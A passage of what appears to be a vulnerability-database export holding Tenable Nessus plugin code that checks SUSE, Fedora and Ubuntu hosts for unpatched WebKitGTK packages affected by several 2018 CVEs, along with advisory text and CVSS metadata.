corruption and application crash) via a\n crafted website (bsc#1097693)\n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL\n and webkitFaviconDatabaseSetIconURLForPageURL mishandle\n an unset pageURL, leading to an application crash\n (bsc#1095611).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1095611\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1097693\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11646/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4190/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4199/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4218/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4222/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4232/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4233/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20182075-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6fc09758\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Desktop Applications 15:zypper in -t\npatch SUSE-SLE-Module-Desktop-Applications-15-2018-1401=1\n\nSUSE Linux Enterprise Module for Basesystem 15:zypper in -t patch\nSUSE-SLE-Module-Basesystem-15-2018-1401=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n 
script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2018/07/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! 
preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"typelib-1_0-WebKit2-4_0-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk3-debugsource-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk3-devel-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"typelib-1_0-WebKit2-4_0-2.20.3-3.3.1\")) 
flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk3-debugsource-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk3-devel-2.20.3-3.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkit2gtk3\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:16:04", "description": "This update addresses the following vulnerabilities :\n\n -\n [CVE-2018-4190](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4190),\n [CVE-2018-4199](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4199),\n [CVE-2018-4218](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4218),\n [CVE-2018-4222](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4222),\n [CVE-2018-4232](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4232),\n [CVE-2018-4233](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4233),\n [CVE-2018-4246](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4246),\n [CVE-2018-11646](https://cve.mitre.org/cgi-bin/cvename.c\n gi?name=CVE-2018-11646).\n\nAdditional fixes :\n\n - Fix installation directory of API documentation.\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Properly detect compiler flags, needed libs, and\n fallbacks for usage of 64-bit atomic 
operations.\n\n - Fix a network process crash when trying to get cookies\n of about:blank page.\n\n - Fix UI process crash when closing the window under\n Wayland.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 14, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-01-03T00:00:00", "title": "Fedora 28 : webkit2gtk3 (2018-118b9abf99)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4199", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4232"], "modified": "2019-01-03T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:webkit2gtk3", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-118B9ABF99.NASL", "href": "https://www.tenable.com/plugins/nessus/120240", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-118b9abf99.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120240);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-11646\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\", \"CVE-2018-4246\");\n script_xref(name:\"FEDORA\", value:\"2018-118b9abf99\");\n\n script_name(english:\"Fedora 28 : webkit2gtk3 (2018-118b9abf99)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n 
script_set_attribute(\n attribute:\"description\", \n value:\n\"This update addresses the following vulnerabilities :\n\n -\n [CVE-2018-4190](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4190),\n [CVE-2018-4199](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4199),\n [CVE-2018-4218](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4218),\n [CVE-2018-4222](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4222),\n [CVE-2018-4232](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4232),\n [CVE-2018-4233](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4233),\n [CVE-2018-4246](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4246),\n [CVE-2018-11646](https://cve.mitre.org/cgi-bin/cvename.c\n gi?name=CVE-2018-11646).\n\nAdditional fixes :\n\n - Fix installation directory of API documentation.\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Properly detect compiler flags, needed libs, and\n fallbacks for usage of 64-bit atomic operations.\n\n - Fix a network process crash when trying to get cookies\n of about:blank page.\n\n - Fix UI process crash when closing the window under\n Wayland.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-118b9abf99\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkit2gtk3 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n 
script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"webkit2gtk3-2.20.3-1.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkit2gtk3\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:20:36", "description": "This update addresses the following vulnerabilities :\n\n -\n [CVE-2018-4190](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4190),\n [CVE-2018-4199](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4199),\n [CVE-2018-4218](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4218),\n [CVE-2018-4222](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4222),\n [CVE-2018-4232](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4232),\n [CVE-2018-4233](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4233),\n [CVE-2018-4246](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4246),\n [CVE-2018-11646](https://cve.mitre.org/cgi-bin/cvename.c\n gi?name=CVE-2018-11646).\n\nAdditional fixes :\n\n - Fix installation directory of API documentation.\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Properly detect compiler flags, needed libs, and\n fallbacks for usage of 64-bit atomic operations.\n\n - Fix a network process crash when trying to get cookies\n of about:blank page.\n\n - 
Fix UI process crash when closing the window under\n Wayland.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 20, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-07-02T00:00:00", "title": "Fedora 27 : webkitgtk4 (2018-aac3ca8936)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4199", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4232"], "modified": "2018-07-02T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:27", "p-cpe:/a:fedoraproject:fedora:webkitgtk4"], "id": "FEDORA_2018-AAC3CA8936.NASL", "href": "https://www.tenable.com/plugins/nessus/110823", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-aac3ca8936.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(110823);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-11646\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\", \"CVE-2018-4246\");\n script_xref(name:\"FEDORA\", value:\"2018-aac3ca8936\");\n\n script_name(english:\"Fedora 27 : webkitgtk4 (2018-aac3ca8936)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update addresses the following 
vulnerabilities :\n\n -\n [CVE-2018-4190](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4190),\n [CVE-2018-4199](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4199),\n [CVE-2018-4218](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4218),\n [CVE-2018-4222](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4222),\n [CVE-2018-4232](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4232),\n [CVE-2018-4233](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4233),\n [CVE-2018-4246](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4246),\n [CVE-2018-11646](https://cve.mitre.org/cgi-bin/cvename.c\n gi?name=CVE-2018-11646).\n\nAdditional fixes :\n\n - Fix installation directory of API documentation.\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Properly detect compiler flags, needed libs, and\n fallbacks for usage of 64-bit atomic operations.\n\n - Fix a network process crash when trying to get cookies\n of about:blank page.\n\n - Fix UI process crash when closing the window under\n Wayland.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-aac3ca8936\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkitgtk4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:webkitgtk4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"webkitgtk4-2.20.3-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkitgtk4\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-18T10:55:38", "description": "A large number of security issues were discovered in the WebKitGTK+\nWeb and JavaScript engines. If a user were tricked into viewing a\nmalicious website, a remote attacker could exploit a variety of issues\nrelated to web browser security, including cross-site scripting\nattacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-19T00:00:00", "title": "Ubuntu 16.04 LTS / 17.10 / 18.04 LTS : WebKitGTK+ vulnerabilities (USN-3687-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4199", "CVE-2018-4190", "CVE-2018-12293", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4232"], "modified": "2018-06-19T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:17.10", "p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37", "p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts"], "id": "UBUNTU_USN-3687-1.NASL", "href": "https://www.tenable.com/plugins/nessus/110611", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3687-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110611);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/17\");\n\n script_cve_id(\"CVE-2018-12293\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\");\n script_xref(name:\"USN\", value:\"3687-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 17.10 / 18.04 LTS : WebKitGTK+ vulnerabilities (USN-3687-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A large number of security issues were discovered in the WebKitGTK+\nWeb and JavaScript engines. If a user were tricked into viewing a\nmalicious website, a remote attacker could exploit a variety of issues\nrelated to web browser security, including cross-site scripting\nattacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
